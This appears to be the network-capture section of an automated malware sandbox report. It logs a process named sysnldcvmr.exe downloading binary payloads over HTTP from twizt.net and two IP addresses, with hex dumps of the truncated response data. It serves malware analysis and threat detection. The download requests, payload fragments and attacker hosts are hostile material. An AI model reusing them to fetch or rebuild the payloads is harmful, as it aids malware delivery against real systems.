                                                                  Data Ascii: 3UB;EMQUEPyEMU}uEPMQUR{EPMQUR:EPMQjUR{EMUEBMQUEEM;MsUM3]UEHQUP8
                                                                  Nov 28, 2024 18:18:30.570241928 CET1236INData Raw: 89 55 f0 8b 45 e0 03 45 14 89 45 e0 c7 45 e4 00 00 00 00 8b 4d f0 89 4d ec 8b 55 e0 89 55 d4 8b 45 d4 33 d2 f7 75 f4 89 45 f0 8b 45 f0 0f af 45 f4 8b 4d d4 2b c8 89 4d e8 8b 55 e8 c1 e2 10 0b 55 d0 89 55 d4 81 7d f0 00 00 01 00 74 0c 8b 45 f0 0f
                                                                  Data Ascii: UEEEEMMUUE3uEEEM+MUUU}tEE;Ev<MMUUUEEE}sMM;MvUUE%EMMMUREPMQUR;E%tMMUUUE
                                                                  Nov 28, 2024 18:18:30.687505960 CET1236INData Raw: 4d 18 8b 11 52 8b 45 10 50 8b 4d 08 51 e8 10 0b 00 00 83 c4 10 8b 55 0c 89 02 33 c0 e9 1a 03 00 00 83 7d cc 00 7d 1b 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 e8 ca 07 00 00 83 c4 0c 33 c0 e9 f9 02 00 00 83 7d cc 00 75 59 8b 45 fc 50 8b 4d 18 51 8b 55
                                                                  Data Ascii: MREPMQU3}}EPMQUR3}uYEPMQURE}}EPMQUR3}uEPjMQ3EEUU} sEMT#UtEEMQUREPMQ
                                                                  Nov 28, 2024 18:18:33.160669088 CET176OUTGET /peinstall.php HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                  Host: twizt.net
                                                                  Nov 28, 2024 18:18:33.723968029 CET184INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.1049703185.215.113.66807656C:\Windows\sysnldcvmr.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 28, 2024 18:18:40.271831989 CET166OUTGET /1 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 185.215.113.66
                                                                  Nov 28, 2024 18:18:41.727097034 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:41 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 8960
                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "671230ee-2300"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                  Nov 28, 2024 18:18:41.727135897 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                  Nov 28, 2024 18:18:41.730559111 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                  Nov 28, 2024 18:18:41.730573893 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                  Nov 28, 2024 18:18:41.730588913 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                  Nov 28, 2024 18:18:41.731241941 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                  Nov 28, 2024 18:18:41.731255054 CET1236INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>
                                                                  Nov 28, 2024 18:18:41.731268883 CET248INData Raw: c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67 ab 4d 68 f2 77 f9 52 c2 4f fa a0 61 6b e3 3a e6 0e 25 78 4e 3b a3 59 5d 02 e8 e2 07 c4 08 44 69 97 04 49 86
                                                                  Data Ascii: OoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1
                                                                  Nov 28, 2024 18:18:41.731926918 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                  Nov 28, 2024 18:18:41.731964111 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.1049706185.215.113.66807656C:\Windows\sysnldcvmr.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 28, 2024 18:18:43.111243010 CET166OUTGET /1 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 185.215.113.66
                                                                  Nov 28, 2024 18:18:44.488215923 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:44 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 8960
                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "671230ee-2300"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                  Nov 28, 2024 18:18:44.488320112 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                  Nov 28, 2024 18:18:44.489069939 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                  Nov 28, 2024 18:18:44.489093065 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                  Nov 28, 2024 18:18:44.489104033 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                  Nov 28, 2024 18:18:44.489758968 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                  Nov 28, 2024 18:18:44.489820957 CET1236INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>
                                                                  Nov 28, 2024 18:18:44.489831924 CET248INData Raw: c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67 ab 4d 68 f2 77 f9 52 c2 4f fa a0 61 6b e3 3a e6 0e 25 78 4e 3b a3 59 5d 02 e8 e2 07 c4 08 44 69 97 04 49 86
                                                                  Data Ascii: OoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1
                                                                  Nov 28, 2024 18:18:44.490613937 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                  Nov 28, 2024 18:18:44.490719080 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.104971191.202.233.141807656C:\Windows\sysnldcvmr.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 28, 2024 18:18:47.424236059 CET170OUTGET /gonup HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 91.202.233.141
                                                                  Nov 28, 2024 18:18:48.794306993 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:48 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 81152
                                                                  Last-Modified: Tue, 12 Nov 2024 22:30:16 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "6733d6f8-13d00"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3e 6f 3f 5d 08 fd eb d4 2e a4 be 57 7f f0 79 da c6 cd 34 ac 9e c4 e6 c3 0f d5 04 91 b3 91 29 0e 58 da b0 46 4c c5 67 7d 4d cc dd a3 75 75 17 93 4e bf ad d7 e2 c2 13 69 2e 03 e4 ff 15 4f a6 4f 40 0c 24 2c 65 36 33 d3 a9 48 81 d4 d9 81 8f 02 84 85 56 85 ed 7e 52 ed 88 cd 56 aa dd 59 65 d9 99 05 5e 5e 7c 3b 51 85 02 46 fa 55 7f c8 af af 39 e7 56 6d 0f fd 3f 7d 87 e3 58 7c 9c b5 21 cc e3 c9 b5 11 24 3f ee 2f 56 82 7d a0 9a 07 dc a4 fa 43 f0 dd a7 5a 64 a9 07 f2 bc c8 fb e9 ac 3a 49 55 f2 1d 66 9c 33 f7 0f 77 67 72 d3 82 1f 88 6b 16 9c e9 76 2f 89 1e 0b 76 88 54 f8 3a 55 10 9e 8f 86 b7 e1 ef d2 a2 1b c1 66 ee 48 82 34 73 c3 e1 2c bc 68 fd d0 21 f5 2c bb e3 27 88 f0 1a 63 80 23 32 1e 13 c5 27 bd 2b 8f 7c 53 77 8c a1 be 1f 1c ac 07 23 95 8f 20 7e 38 b1 63 18 d8 51 ee f6 60 4d db 7e 1b 40 96 b0 2e fb 74 5e 21 82 80 9f 48 d3 c7 35 e1 99 b0 58 f4 e1 6f 5e 8c e1 f1 8d c1 cf 63 d8 bd d2 2b 54 1d 67 e1 3d a0 ba eb e3 98 25 a1 98 e8 d3 81 44 74 34 75 be 5d e6 25 67 05 25 5e 1b 6a 72 09 de e8 9b 22 87 53 d9 fd 8d [TRUNCATED]
                                                                  Data Ascii: >o?].Wy4)XFLg}MuuNi.OO@$,e63HV~RVYe^^|;QFU9Vm?}X|!$?/V}CZd:IUf3wgrkv/vT:UfH4s,h!,'c#2'+|Sw# ~8cQ`M~@.t^!H5Xo^c+Tg=%Dt4u]%g%^jr"SFJ(sXsXw%fOm'1^(tJ0StBA5LK:E[k3R&. I,@A'N@97K]Ag#*,^['+B1V2#U1$3h)VM(}y4h2bg(|#{NW)&^?r`.hb&7$bb~b*:'bcrxx&&`(Deuu5Dy=Pe4</T2Qb1pA9oXe(R@Lfl,DW*JZh|^W]cf<PkHk4bGB}zQ\[JqI!znIV<^q#68+}!{.<TvPi`VlC&6~#5g@)wGf9wlr`n ()3+(3 Q294AY_x90r@:mi[72p6yMh
                                                                  Nov 28, 2024 18:18:48.794363976 CET1236INData Raw: b4 93 89 63 39 25 6e 55 b7 29 1c 62 02 48 82 e2 92 dd 36 c0 1c db c6 81 1e 11 3e fe 9d 6c 5a 9f f4 38 bf e8 56 bb 51 7c b8 c2 f0 3d ce 8c d2 05 db 47 d3 77 c1 db f3 76 9f cf e3 28 1a e2 c7 c8 07 b2 85 27 33 8a 87 bb 0d 80 3f 5d 75 bd a0 f4 ea fe
                                                                  Data Ascii: c9%nU)bH6>lZ8VQ|=Gwv('3?]uk_8&'\B` O$B]5H!9=d.]<)q%'%-z\fP{t$$m+W@my<Kb`k#2&UjcE@ra
                                                                  Nov 28, 2024 18:18:48.794377089 CET1236INData Raw: e0 a8 73 bb 8b 76 47 40 7e 33 a5 dc 11 92 f4 67 af 03 7f bd cd cb 9c c2 49 2c ef 2c a3 96 a0 25 6f 3e aa 39 ae 12 d7 53 31 e7 fb a3 52 3b 02 79 dd 15 87 8f d8 dc 69 e3 25 b2 10 26 c5 ac e4 72 f4 69 2a 54 a8 e8 6f 51 7a c1 38 e3 72 d4 8d 4c b1 b5
                                                                  Data Ascii: svG@~3gI,,%o>9S1R;yi%&ri*ToQz8rLA}0S"1GWmW5jD~UE0@N&oz,)]w%9i)+ON<AzzD@k6T.`x[Lv2/n-ZC
                                                                  Nov 28, 2024 18:18:48.794452906 CET672INData Raw: bc 34 1c 71 cb 5b 8e 49 88 a8 ad f2 a2 84 01 cf f9 56 76 ee 10 04 c6 ce 90 41 ca 0e e1 71 df d1 44 fa fe e1 24 48 8b a2 37 4d 44 ee 18 e7 75 65 a5 08 4e f3 42 41 1f 97 20 ca 87 69 00 37 e2 a0 8d ed c8 97 b6 0a a1 8c 78 66 bb b3 b8 d3 3a 76 29 20
                                                                  Data Ascii: 4q[IVvAqD$H7MDueNBA i7xf:v) _sh}mLNWl@pXUGA`wWfFjzMFJQ_ '#e@5@qdc]Gm(Hzn586~e<s5VW'V+1u8R
                                                                  Nov 28, 2024 18:18:48.794464111 CET1236INData Raw: 79 65 73 10 7b 2e cf 15 26 46 41 96 75 fa cc 13 90 73 49 32 81 ad b0 54 0f 3b 61 84 76 3d 7d c3 76 f9 7a d9 55 bd 72 ef 88 8f ea 79 81 43 07 da 24 64 43 80 2d 56 f9 f0 80 a5 53 e1 90 35 3a 23 4c 0a 14 07 76 8d 6f cb 6a b9 d1 05 c4 b5 84 a4 05 72
                                                                  Data Ascii: yes{.&FAusI2T;av=}vzUryC$dC-VS5:#Lvojr2wQcJfO6jRm>02YJp`PM*0uy[o"tQ@JJPl7re?Fc^u}rbG~h(>e!W{x4WM>Uw?8IxE~< eE}L
                                                                  Nov 28, 2024 18:18:48.794504881 CET1236INData Raw: 39 d7 bf 0f b9 f5 2f 37 d0 8f e5 35 96 92 d5 b7 44 06 26 30 09 74 79 d2 f1 0c 9c 7a 98 1a 25 f1 73 7d 1c e4 bb 45 2f c5 da cc 7d ce bd 12 0b cb 9a 37 e6 8f 4e d3 f7 5b 7d 77 22 b0 bd 72 5d eb e4 6c a2 3f fd e3 57 5e 38 03 10 7e 25 a8 c4 2a 07 5d
                                                                  Data Ascii: 9/75D&0tyz%s}E/}7N[}w"r]l?W^8~%*]:&p"6{NDf&lq-0ny5,=N)+..:i{}ck(-)j=&L/7wzqnUDXS(3
                                                                  Nov 28, 2024 18:18:48.794518948 CET1236INData Raw: 37 99 43 d6 c0 fc c6 9d 11 46 a6 71 d3 df 26 0d dc 34 48 b5 ec 76 5e 41 a5 fc 15 01 fe 47 57 cf c8 c5 5a 42 e4 7f 01 e1 ff fa 60 c3 42 f8 b2 f9 e5 99 03 fb c4 fd 2c b0 4e bc a5 01 0b b2 f5 26 de f4 f1 64 8e 17 ae 2e f0 73 4e b2 41 3d e1 af 3f e5
                                                                  Data Ascii: 7CFq&4Hv^AGWZB`B,N&d.sNA=?R=G~7~af_tIJE8]Qi`h4JTK#*6m$b^XqlnymvdMXeR(u`%i
                                                                  Nov 28, 2024 18:18:48.794529915 CET1236INData Raw: 18 cc cd 2e 2c 93 be f5 64 21 53 28 67 7c 9f 84 16 87 23 f1 17 86 59 2e 5f d2 2e 27 47 91 31 39 a5 fa 7b 79 75 f2 ca f2 20 69 fa 3e 65 90 eb d4 bd 73 bc e1 3b dd 6e c3 13 13 6a 1c 1c 3a ee 0c a0 13 63 dd 75 a0 5e be b1 11 24 13 7d df 1e 5b 85 91
                                                                  Data Ascii: .,d!S(g|#Y._.'G19{yu i>es;nj:cu^$}[ypBK(8l~nxpYD93ztk+;+.N)TUadbh#^cQ=?`[7Ln]GEADWPMJGRpi2eKKcBS/<
                                                                  Nov 28, 2024 18:18:48.794764996 CET328INData Raw: 75 85 fd 8b 7b 64 6d 67 e3 96 2f 34 31 cf ed 26 97 8e 88 d4 44 92 20 bc bf 81 65 42 f1 9e 7b 72 7f 6a 20 c5 82 f0 20 e7 5b b8 a8 24 e7 c4 c3 5d ed 53 61 0a 7d 71 e8 5a 71 31 23 11 4e 0c 36 e1 f5 75 b1 a5 65 23 90 7e 5c e6 63 50 19 23 7a ff 83 74
                                                                  Data Ascii: u{dmg/41&D eB{rj [$]Sa}qZq1#N6ue#~\cP#ztb`kkI4&"/V+n^@8To#)ldAzEy<0kUC^C~v*5kYvJRZD,pZI|{2Q+7>+%i7^V.-(
